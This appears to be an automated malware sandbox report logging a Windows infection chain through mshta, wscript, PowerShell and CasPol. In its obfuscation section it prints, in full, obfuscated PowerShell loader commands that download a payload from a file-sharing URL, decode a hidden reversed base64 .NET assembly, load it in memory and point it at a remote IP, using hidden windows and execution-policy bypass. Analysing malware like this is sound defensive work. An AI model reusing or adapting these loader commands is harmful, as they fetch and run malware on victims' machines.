Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1302780296.00000000034A8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000010.00000002.1715001566.0000000006DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: q;C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.pdb source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1310602122.0000000008B14000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000010.00000002.1715001566.0000000006DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041BCE3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_052C55EF pushfd ; retf 3_2_052C5619
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_052C5641 pushfd ; retf 3_2_052C5619
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_07DF2C6C push eax; ret 3_2_07DF2C81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_004567E0 push eax; ret 18_2_004567FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_0045B9DD push esi; ret 18_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_00455EAF push ecx; ret 18_2_00455EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_00433FF6 push ecx; ret 18_2_00434009
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_00406128 ShellExecuteW,URLDownloadToFileW,18_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00419BC4

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 18_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041BCE3
                    Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
